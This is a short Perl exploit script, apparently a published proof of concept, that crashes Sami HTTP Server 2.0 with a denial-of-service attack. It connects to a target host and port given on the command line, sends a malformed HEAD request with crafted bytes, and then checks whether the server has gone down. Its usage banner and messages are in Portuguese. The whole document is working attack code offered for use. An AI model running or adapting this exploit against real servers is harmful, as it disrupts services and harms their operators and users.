#!/usr/bin/perl -w # # # Date: 06/14/2021 14 Jun # # Version Vulnerable: Sami HTTP 2.0 # # OS Tested: Windows XP PACK 3 Brazilian # use IO::Socket; $sis="$^O"; print $sis; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); if ((!$ARGV[0]) || (!$ARGV[1])) { &apresentacao(); exit; } sub apresentacao { print q { ############################################################## # # # [*] Sami HTTP Server 2.0 Denied Of Service # # # # # # [*] Author: Fernando Mengali # # # # # # [+] Modo de uso: perl exploit.pl # # # # # ################# Code Exploit ############################### } } $target = $ARGV[0]; $porta = $ARGV[1]; print "Sobrecarregando servidor...\n"; $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $porta, Proto => "tcp", Timeout => 1) || die "Não foi possível conectar ao servidor: $target!\n"; print $socket "HEAD /\x41\x42\x43\x44\x45\x46\x47\x25\x49 HTTP/1.0\n"; close($socket); sleep(10); $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $porta, Proto => "tcp", Timeout => 1) || die "Servidor down: $target!\n"; print $socket "HEAD / HTTP/1.0\n"; close($socket);